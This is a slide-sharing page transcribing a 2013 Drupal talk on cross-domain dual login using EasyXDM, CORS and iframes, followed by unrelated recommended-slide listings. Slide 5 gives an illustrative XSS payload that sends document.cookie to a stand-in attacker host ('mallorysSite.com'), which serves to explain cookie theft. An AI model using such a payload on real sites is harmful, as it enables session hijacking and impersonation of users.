non evil xss with drupal easyxdm
play

Non-Evil XSS with Drupal & EasyXDM Stephen Barker, Digital - PowerPoint PPT Presentation

Mar 04, 2024 •108 likes •309 views

Non-Evil XSS with Drupal & EasyXDM Stephen Barker, Digital Frontiers Media @digitalfrontier Saturday, April 20, 2013 Drupal Security Advisories Drupal.org/security Saturday, April 20, 2013 What is XSS? Cross-Site Scripting attacks are a

  1. Non-Evil XSS with Drupal & EasyXDM Stephen Barker, Digital Frontiers Media @digitalfrontier Saturday, April 20, 2013

  2. Drupal Security Advisories Drupal.org/security Saturday, April 20, 2013

  3. What is XSS? Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Saturday, April 20, 2013

  4. Example: Mallory posts a message with malicious payload to a social network. When Bob reads the message, Mallory's XSS steals Bob's cookie. Mallory can now hijack Bob's session and impersonate Bob. Saturday, April 20, 2013

  5. Example: <IMG SRC="javascript: postMessage (document.cookie, ‘http://mallorysSite.com/pwnd’);"> Saturday, April 20, 2013

  6. MWIDX -Powered by Drupal Saturday, April 20, 2013

  7. Resizing iFrames Containing Dynamic Content <script type="text/javascript"> function iframeLoaded() { var iFrameID = document.getElementById('idIframe'); if(iFrameID) { // here you can meke the height, I delete it first, then I make it again iFrameID.height = ""; iFrameID.height = iFrameID.contentWindow.document.body.scrollHeight + "px"; } } </script> OR script in host called from within the iframe: parent.iframeLoaded(); Saturday, April 20, 2013

  8. CORS Cross-origin resource sharing (CORS) is a mechanism that allows a web page to make XMLHttpRequests to another domain. Such "cross-domain" requests would otherwise be forbidden by web browsers, per the same origin security policy. CORS defines a way in which the browser and the server can interact to determine whether or not to allow the cross-origin request. It is more powerful than only allowing same-origin requests, but it is more secure than simply allowing all such cross-origin requests. Saturday, April 20, 2013

  9. CORS Help enable-cors.org Saturday, April 20, 2013

  10. Dual-Authentication Problem Saturday, April 20, 2013

  11. Client-side Saturday, April 20, 2013

  12. EasyXDM easyxdm.net/wp Saturday, April 20, 2013

  13. Provider (remote) JS var provider = new easyXDM.Rpc({}, { local: { login: { method: function(name, pass) { // Take username/password arguments and fill in legacy login form. $('#legacy-login-form-username-input-id').val(name); $('#legacy-login-form-password-input-id').val(pass); $('#legacy-submit-button-id').click(); // Could probably use .submit instead } // end method } // end login } // end local }); Saturday, April 20, 2013

  14. Consumer (local) JS // Setup the remote rpc for call. var consumer = new easyXDM.Rpc( { remote: "http://example.com/login-page" }, { remote: { login: {} } } } ); Saturday, April 20, 2013

  15. Consumer (local) JS (cont.) // Note: id of Drupal user form here is for the form used in login BLOCK. $('#user-login-form').submit(function(event) { // Interrupt standard Drupal login form submission // May seem a little redundant below, but is apparently needed for some IE cases. event.preventDefault(); if (event.preventDefault) { event.preventDefault(); } else { event.stop(); }; //perform remote RPC login using local Drupal login form field values. consumer.login($('#edit-name').val(), $('#edit-pass').val()); Saturday, April 20, 2013

  16. Consumer (local) JS (cont.) // Probably a more elegant way to handle this, but give 5 seconds for the rpc to connect and drop // authenticated session cookie through hidden easyXDM iframe following login. // Then kill our submission interception and resubmit the Drupal login form // to finally be processed by native handler for local login. setTimeout(function () { $('#user-login-form').unbind('submit').submit(); }, 5000 ); }); Saturday, April 20, 2013

  17. DEMO Saturday, April 20, 2013

  18. (a few) More Details drupalsrq.net/forum-topic/single-signondual- authentication-xss Saturday, April 20, 2013

  19. Stephen Barker, Digital Frontiers Media http://digitalfrontiersmedia.com stephen@digitalfrontiersmedia.com @digitalfrontier Saturday, April 20, 2013

Recommend

Drupal Basics an introduction to Drupal This introductory session will get the Drupal juices

Drupal Basics an introduction to Drupal This introductory session will get the Drupal juices

Drupal Basics an introduction to Drupal This introductory session will get the Drupal juices flowing, and help give a broad overview of Drupal jargon, Drupal Architecture &amp; the Drupal Community... May 21st, 2010 - SNHU, Manchester, NH

1.12k views • 52 slides
Introduction to Drupal Andrew Rudy Outline What is Drupal Why use Drupal (Pros and

Introduction to Drupal Andrew Rudy Outline What is Drupal Why use Drupal (Pros and

Introduction to Drupal Andrew Rudy Outline What is Drupal Why use Drupal (Pros and Cons) Examples of what Drupal can do How to download and install Drupal How to use Drupals user interface What is Drupal? Drupal

319 views • 18 slides
Even-Darker Art of Rails Engines @lazyatom github.com/lazyatom/engines Rails 2.3 history

Even-Darker Art of Rails Engines @lazyatom github.com/lazyatom/engines Rails 2.3 history

The Even-Darker Art of Rails Engines @lazyatom github.com/lazyatom/engines Rails 2.3 history November 2005 its distracting! reuse is overrated! Evil! Evil! Evil! Evil! Evil! Evil! Evil! Evil! Shit! eek! appable_plugins desert

972 views • 96 slides
Mostly Core Constructing real world sites [mostly] using Drupal 8 core Karen Stevenson

Mostly Core Constructing real world sites [mostly] using Drupal 8 core Karen Stevenson

Mostly Core Constructing real world sites [mostly] using Drupal 8 core Karen Stevenson DrupalCamp Florida March 2016 Drupal Drupal Drupal Drupal Drupal Drupal Drupal User Stories Demo Site Drupal 8 core Bootstrap subtheme

537 views • 24 slides
Why Im looking forward to Drupal 8 Who Am I? Jim Taylor drupal.org/u/bigjim @jalama

Why Im looking forward to Drupal 8 Who Am I? Jim Taylor drupal.org/u/bigjim @jalama

Why Im looking forward to Drupal 8 Who Am I? Jim Taylor drupal.org/u/bigjim @jalama Currently: Manager, Web Development @ Highlights for Children Yes Were Hiring! Started with Drupal in 2007 (Drupal 5.2) Past Roles: Owned a small

546 views • 31 slides
DRUPAL [ REMOTELY ] Is Remote Drupal Employment For You? Gray Sadler, Drupal Developer Drupal

DRUPAL [ REMOTELY ] Is Remote Drupal Employment For You? Gray Sadler, Drupal Developer Drupal

DRUPAL [ REMOTELY ] Is Remote Drupal Employment For You? Gray Sadler, Drupal Developer Drupal Camp 2014 | Orlando, Florida DRUPAL [ REMOTELY ] WHATS ON THE MENU TODAY? Working Remotely Challenges Finding Remote Employment [

578 views • 19 slides
The true form of evil rarely looks evil on the surface, it seduces us with fair face as it

The true form of evil rarely looks evil on the surface, it seduces us with fair face as it

Webinar: Abortion &amp; Conscientious Objection 2 July 2020 (Adv Keith Matthee SC) 1 As a nation we would be well advised to heed the words of Professor Forstchen in his review on the film Downfall, which exposes the evil of Adolf

490 views • 11 slides
2016-09-28 Routing in Drupal 9, and lessons learned in Drupal 8 Peter Wolanin

2016-09-28 Routing in Drupal 9, and lessons learned in Drupal 8 Peter Wolanin

2016-09-28 Routing in Drupal 9, and lessons learned in Drupal 8 Peter Wolanin drupal.org/u/pwolanin Track: Core Conversations events.drupal.org/dublin2016/sessions/routing-drupal-9-and-lessons-learned-drupal-8 This is a Conversation If I get

631 views • 23 slides
Drupal for Designers Not decorating on top of what Drupal gives you, but rather, letting

Drupal for Designers Not decorating on top of what Drupal gives you, but rather, letting

Drupal for Designers Not decorating on top of what Drupal gives you, but rather, letting Drupals default behavior simply provide a guide for your design. Drupal for Designers by Dani Nordin http://my.safaribooksonline.com

736 views • 26 slides
Talk to me Drupal Talk to me Drupal Using Drupal to power a Voice App Hello My Name Is Frank

Talk to me Drupal Talk to me Drupal Using Drupal to power a Voice App Hello My Name Is Frank

Talk to me Drupal Talk to me Drupal Using Drupal to power a Voice App Hello My Name Is Frank Hello My Name Is Frank I am a Christian, Father, and Technology Enthusiast. Online my name is frob (IRC, d.o, github) On Twitter I am @frobdfas My Blog

616 views • 44 slides
Moral evil is a result of human action, whereas natural evil can only be blamed on God, if He

Moral evil is a result of human action, whereas natural evil can only be blamed on God, if He

Moral evil is a result of human action, whereas natural evil can only be blamed on God, if He even exists. Natural disasters and diseases seem at odds with a good and benevolent God. Try to remember, though, that God created this universe

462 views • 8 slides
15+ Ways to Debug Drupal 8 Zakiya Khabir Drupal Developer, Chapter Three Why this talk?

15+ Ways to Debug Drupal 8 Zakiya Khabir Drupal Developer, Chapter Three Why this talk?

Stanford Drupal Camp 15+ Ways to Debug Drupal 8 Zakiya Khabir Drupal Developer, Chapter Three Why this talk? End of dpm() Kint complaints Rumors of a better way Audience D7 front-enders New to Drupal Current D8 devs

1.41k views • 48 slides
How Drupal serves global biosecurity Joshua Li Senior Drupal Developer Technocrat About me

How Drupal serves global biosecurity Joshua Li Senior Drupal Developer Technocrat About me

Birds, bees and monster fish: How Drupal serves global biosecurity Joshua Li Senior Drupal Developer Technocrat About me Drupal dev in Technocrat Australia Drupal ID: rli Public sector Twitter: rujiali Module maintainer My

614 views • 30 slides
Talk to me Drupal Talk to me Drupal Using Drupal to power a Voice App Speaker notes Talk to me

Talk to me Drupal Talk to me Drupal Using Drupal to power a Voice App Speaker notes Talk to me

Talk to me Drupal Talk to me Drupal Using Drupal to power a Voice App Speaker notes Talk to me Drupal; Using Drupal to power a Voice App You should be able to follow along by visiting the link below. If you have an Echo device, please mute the

1.67k views • 87 slides
What Can Drupal Do For You? Drupal is wildly popular because it provides a powerful, scalable,

What Can Drupal Do For You? Drupal is wildly popular because it provides a powerful, scalable,

What Can Drupal Do For You? Drupal is wildly popular because it provides a powerful, scalable, low cost, high value solution to manage and grow an internet presence. ~cmswebsiteservices.com About Seth - Who is this guy? Seth Cohn Drupal

671 views • 53 slides
www.drupaleurope.org Drupal PKM A Personal Knowledge Management Drupal distro

www.drupaleurope.org Drupal PKM A Personal Knowledge Management Drupal distro

www.drupaleurope.org Drupal PKM A Personal Knowledge Management Drupal distro https://www.yongt9412.com/assets/drupal_pkm.pdf (Spanish) John Gustavo Choque Condori Drupal 8 Developer at MD Systems @yongt9412 Overview What we gonna talk

835 views • 49 slides
The YES, NO, and MAYBE of Can we build that with Drupal? Joshua Lieb,

The YES, NO, and MAYBE of Can we build that with Drupal? Joshua Lieb,

The YES, NO, and MAYBE of Can we build that with Drupal? Joshua Lieb, Phase2 July 23, 2015 Drupal GovCon 2015 Can I build it with Drupal? Drupal has come a long way in the last fifteen years - I dont know what the

440 views • 29 slides
www.drupaleurope.org The Future of Drupal Watchdog Magazine Brian Osborn, Drupal Watchdog

www.drupaleurope.org The Future of Drupal Watchdog Magazine Brian Osborn, Drupal Watchdog

www.drupaleurope.org The Future of Drupal Watchdog Magazine Brian Osborn, Drupal Watchdog Publisher Drupal Community Track Drupal Watchdog @drupalwatchdog www.drupalwatchdog.com Drupal Watchdog - History First launched in 2011

358 views • 11 slides
What you want, out- of-the-box! An introduction to Panopoly and Drupal distributions About

What you want, out- of-the-box! An introduction to Panopoly and Drupal distributions About

What you want, out- of-the-box! An introduction to Panopoly and Drupal distributions About David Snopek http:// mvpcreator .com Freelance Drupal developer Co-maintainer of Panopoly (and 20-ish other Open Source projects on Drupal.org)

721 views • 38 slides
Mapping with Drupal Hello world map Boris Doesborg Drupal site builder &amp; analyst

Mapping with Drupal Hello world map Boris Doesborg Drupal site builder &amp; analyst

Mapping with Drupal Hello world map Boris Doesborg Drupal site builder &amp; analyst @batigolix on twitter and drupal.org T erms, names, concepts Addressfield, Base layer, Clustering, Coordinates, Computed field, Data overlay,

494 views • 31 slides
Supporting Drupal-as-a-Service Providing Tech Support to Drupal Devs Add speaker name here Kyle

Supporting Drupal-as-a-Service Providing Tech Support to Drupal Devs Add speaker name here Kyle

Supporting Drupal-as-a-Service Providing Tech Support to Drupal Devs Add speaker name here Kyle Hakala University of Minnesota Add speaker name here Drupal Lite Drupal Enterprise Who are our customers? Professors (well, graduate

600 views • 24 slides
Migrating Multilingual Content to Drupal 8 Our expertise, your digital DNA | evolvingweb.ca |

Migrating Multilingual Content to Drupal 8 Our expertise, your digital DNA | evolvingweb.ca |

Migrating Multilingual Content to Drupal 8 Our expertise, your digital DNA | evolvingweb.ca | @evolvingweb Jigar Mehta aka Jerry Drupal Developer @ Evolving Web PHP since 2008 Drupal since 2013 jigarius on drupal.org, linkedin, twitter, etc.

507 views • 34 slides
What is Drupal? Or What is this Drew-Paul thing you do? Drupal for the average person

What is Drupal? Or What is this Drew-Paul thing you do? Drupal for the average person

What is Drupal? Or What is this Drew-Paul thing you do? Drupal for the average person Drupal lets me build websites that help people build their own websites without needing to know anything about programming Drupal for IT People Drupal

627 views • 26 slides
WELCOME TO DRUPAL Everything You Need to Know to Be Dangerous Drew Gorton, Director of Community

WELCOME TO DRUPAL Everything You Need to Know to Be Dangerous Drew Gorton, Director of Community

WELCOME TO DRUPAL Everything You Need to Know to Be Dangerous Drew Gorton, Director of Community and Agency Outreach, Pantheon drupal.org/u/dgorton @dgorton Our Topics Drupal from 50,000 Feet Worldview Terminology Drupal

442 views • 13 slides

More recommend